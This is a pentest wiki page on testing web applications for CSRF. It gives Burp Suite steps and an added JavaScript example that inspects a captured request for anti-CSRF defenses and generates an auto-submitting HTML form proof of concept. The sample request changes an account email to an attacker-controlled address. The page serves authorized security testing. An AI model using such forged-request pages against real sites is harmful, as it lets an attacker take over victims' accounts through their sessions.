Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

CSRF

POC

  • Capture the state-changing request (for example in Burp Proxy) and check that no anti-CSRF token is sent in the body or query string and that no X-CSRF-Token (or similar custom) header is present. Note the Content-Type as well: a cross-site HTML form can only reproduce application/x-www-form-urlencoded, multipart/form-data and text/plain bodies without a CORS preflight.
  • Generate a CSRF HTML PoC for the request with Burp Suite Professional (right-click the request, Engagement tools > Generate CSRF PoC) and save it as an HTML file.
  • While logged in to the target in a browser, open the HTML file and confirm that the intended action is performed with the victim's session. If it does not go through, check whether the session cookie carries SameSite=Lax or Strict or whether the server validates the Origin/Referer header; either can block the attack even when no token is used.
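The three steps above as a runnable walkthrough. This is an added example, not Cobalt's wiki code and not Burp's generator: it parses a captured request, lists the CSRF defenses a tester looks for, and emits an auto-submitting form PoC of the kind Burp produces. The request, the host target.example and the session cookie value are constructed for the example, and the token parameter names are a heuristic list, not a standard.

```javascript
// Added example (not Cobalt's or Burp's code). The request below is constructed;
// target.example is a fictional host and the cookie value is made up.
const SAMPLE_REQUEST = [
  'POST /account/email HTTP/1.1',
  'Host: target.example',
  'Cookie: session=abc123',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 29',
  '',
  'email=attacker%40evil.example',
].join('\r\n');

// Heuristic names of anti-CSRF headers and parameters (assumption, not a standard list).
const CSRF_HEADER_NAMES = ['x-csrf-token', 'x-xsrf-token', 'x-requested-with'];
const CSRF_PARAM_PATTERN = /(csrf|xsrf|_token|authenticity_token|requestverificationtoken)/i;
// Body types a plain HTML form can send cross-origin without a CORS preflight.
const FORM_CONTENT_TYPES = ['', 'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];

// Parse a raw HTTP/1.1 request into method, path, headers and parameters.
function parseRequest(raw) {
  const [head, body = ''] = raw.split('\r\n\r\n');
  const lines = head.split('\r\n');
  const [method, target] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx > 0) headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  const [path, query = ''] = target.split('?');
  // Parameters live in the query string for GET and in the form body otherwise.
  const params = new URLSearchParams(method === 'GET' ? query : body);
  return { method, path, headers, params };
}

// Return the reasons this request is probably NOT exploitable via a cross-site form.
// An empty list only means "no visible defense": Origin/Referer validation and a
// SameSite session cookie are not visible in the request, so the browser PoC is the real test.
function findCsrfDefenses(req) {
  const findings = [];
  for (const name of CSRF_HEADER_NAMES) {
    if (name in req.headers) findings.push(`custom header ${name}`);
  }
  for (const [key] of req.params) {
    if (CSRF_PARAM_PATTERN.test(key)) findings.push(`token parameter ${key}`);
  }
  if (!['GET', 'POST'].includes(req.method)) {
    findings.push(`method ${req.method} cannot be sent by an HTML form`);
  }
  const contentType = (req.headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  if (!FORM_CONTENT_TYPES.includes(contentType)) {
    findings.push(`content type ${contentType} needs a CORS preflight`);
  }
  return findings;
}

// Build the auto-submitting form PoC; the scheme is assumed to be https unless given.
function buildCsrfPoc(req, scheme = 'https') {
  const escapeAttr = s => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
  const action = `${scheme}://${req.headers.host}${req.path}`;
  const inputs = [...req.params]
    .map(([k, v]) => `    <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join('\n');
  return [
    '<html>',
    '  <body>',
    `  <form action="${escapeAttr(action)}" method="${req.method}">`,
    inputs,
    '    <input type="submit" value="Submit request">',
    '  </form>',
    '  <script>document.forms[0].submit();</script>',
    '  </body>',
    '</html>',
  ].join('\n');
}

// Steps 1 and 2 of the wiki procedure: inspect, then generate the PoC if nothing blocks it.
function assessCsrf(raw) {
  const req = parseRequest(raw);
  const defenses = findCsrfDefenses(req);
  return { request: req, defenses, poc: defenses.length === 0 ? buildCsrfPoc(req) : null };
}

const result = assessCsrf(SAMPLE_REQUEST);
if (result.poc) {
  console.log('No visible CSRF defense; save and open this while logged in:\n' + result.poc);
} else {
  console.log('Request appears protected: ' + result.defenses.join(', '));
}
```

Save the printed HTML to a file and open it in a browser that holds a valid session on the target (step 3 of the procedure). The generated page is a real cross-site request, so run it only against in-scope targets; an empty defenses list is a lead, not proof, until the action is observed to succeed with the victim's session.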

Impact

Low-Medium-High (depends on the action)

Likelihood

Low-Medium